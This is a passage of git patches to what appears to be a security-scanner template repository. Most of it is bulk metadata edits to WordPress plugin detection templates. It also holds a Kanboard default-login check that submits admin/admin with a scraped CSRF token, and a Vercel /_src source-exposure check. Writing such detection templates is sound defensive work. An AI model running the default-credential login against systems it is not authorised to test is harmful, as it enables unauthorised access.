diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 68ec357dea4410ac20eba4710e8263b6c9b9c2ef Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sat, 23 Sep 2023 01:33:43 +0530
Subject: [PATCH 0485/1090] false positive fix

---
 .../kanboard-default-login.yaml               | 30 +++++++------------
 1 file changed, 11 insertions(+), 19 deletions(-)

diff --git a/http/default-logins/kanboard-default-login.yaml b/http/default-logins/kanboard-default-login.yaml
index 4f2957c944..d6b579ad95 100644
--- a/http/default-logins/kanboard-default-login.yaml
+++ b/http/default-logins/kanboard-default-login.yaml
@@ -14,9 +14,9 @@ info:
     cvss-score: 8.3
     cwe-id: CWE-522
   metadata:
-    max-request: 3
+    max-request: 2
     verified: true
-    shodan-query: http.favicon.hash:2056442365
+    fofa-query: app="Kanboard"
   tags: default-login,kanboard
 
 http:
@@ -32,34 +32,26 @@ http:
 
         username={{user}}&password={{pass}}&csrf_token={{csrf_token}}
 
-      - |
-        GET /?controller=DashboardController&action=show HTTP/1.1
-        Host: {{Hostname}}
-
+    cookie-reuse: true
     attack: pitchfork
     payloads:
       user:
         - admin
       pass:
         - admin
+
     extractors:
       - type: regex
         name: csrf_token
         part: body
-        internal: true
         group: 1
         regex:
           - "hidden\" name=\"csrf_token\" value=\"([0-9a-z]+)\""
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - 'New project'
-          - 'Project management'
-        condition: and
-        case-insensitive: true
+        internal: true
 
-      - type: status
-        status:
-          - 200
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(location, 'controller=DashboardController&action=show')
+          - status_code == 302
+        condition: and

From 74f9a33ea59d5571da4e225edb4c4c5c4d921b99 Mon Sep 17 00:00:00 2001
From: hlop 
Date: Sat, 23 Sep 2023 01:06:28 +0300
Subject: [PATCH 0486/1090] Added vercel-source-exposure template

---
 .../vercel-source-exposure.yaml               | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 http/misconfiguration/vercel-source-exposure.yaml

diff --git a/http/misconfiguration/vercel-source-exposure.yaml b/http/misconfiguration/vercel-source-exposure.yaml
new file mode 100644
index 0000000000..8c5615e426
--- /dev/null
+++ b/http/misconfiguration/vercel-source-exposure.yaml
@@ -0,0 +1,28 @@
+id: vercel-source-disclosure
+info:
+  name: Vercel Source Code Disclosure
+  author: hlop
+  severity: medium
+  tags: vercel,exposure,misconfig
+  description: Vercel /_src endpoint publicly accessible which discloses source code.
+  reference: "https://vercel.com/docs/projects/overview#logs-and-source-protection" 
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/_src"
+    redirects: true
+    max-redirects: 3
+    matchers-condition: and
+    matchers:
+     - type: word
+       words:
+         - "Deployment Source"
+         - "Deployment Source – Dashboard – Vercel"
+       condition: and
+       part: body
+     - type: word
+       words:
+         - "Login – Vercel"
+       part: body
+       negative: true

From f462c7dc36714cb44da9a4b37ba8c7e392b431f9 Mon Sep 17 00:00:00 2001
From: hlop 
Date: Sat, 23 Sep 2023 01:14:26 +0300
Subject: [PATCH 0487/1090] Update vercel-source-exposure.yaml

---
 http/misconfiguration/vercel-source-exposure.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/misconfiguration/vercel-source-exposure.yaml b/http/misconfiguration/vercel-source-exposure.yaml
index 8c5615e426..d89df3fbb7 100644
--- a/http/misconfiguration/vercel-source-exposure.yaml
+++ b/http/misconfiguration/vercel-source-exposure.yaml
@@ -1,4 +1,4 @@
-id: vercel-source-disclosure
+id: vercel-source-exposure
 info:
   name: Vercel Source Code Disclosure
   author: hlop

From ad375bbb565a856e517ef4ac32a30fceee33144b Mon Sep 17 00:00:00 2001
From: hlop 
Date: Sat, 23 Sep 2023 01:16:24 +0300
Subject: [PATCH 0488/1090] Update vercel-source-exposure.yaml

---
 http/misconfiguration/vercel-source-exposure.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/misconfiguration/vercel-source-exposure.yaml b/http/misconfiguration/vercel-source-exposure.yaml
index d89df3fbb7..6256ba19fd 100644
--- a/http/misconfiguration/vercel-source-exposure.yaml
+++ b/http/misconfiguration/vercel-source-exposure.yaml
@@ -1,6 +1,6 @@
 id: vercel-source-exposure
 info:
-  name: Vercel Source Code Disclosure
+  name: Vercel Source Code Exposure
   author: hlop
   severity: medium
   tags: vercel,exposure,misconfig

From f17ec7e9cefcf5aa7d68e01c311ca2d6123a683e Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 23 Sep 2023 04:02:04 +0000
Subject: [PATCH 0489/1090] Auto WordPress Plugins Update [Sat Sep 23 04:02:04
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt        | 2 +-
 helpers/wordpress/plugins/enable-media-replace.txt              | 2 +-
 helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt     | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 203 files changed, 3 insertions(+), 203 deletions(-)

diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt
index 01fc15a713..9ec58f6633 100644
--- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt
+++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt
@@ -1 +1 @@
-3.29.4
\ No newline at end of file
+3.30
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/enable-media-replace.txt b/helpers/wordpress/plugins/enable-media-replace.txt
index 8c7fafd365..9d086c6dff 100644
--- a/helpers/wordpress/plugins/enable-media-replace.txt
+++ b/helpers/wordpress/plugins/enable-media-replace.txt
@@ -1 +1 @@
-4.1.3
\ No newline at end of file
+4.1.4
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
index 024a87fcf5..0165858c68 100644
--- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
+++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
@@ -1 +1 @@
-2.7.9
\ No newline at end of file
+2.7.10
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
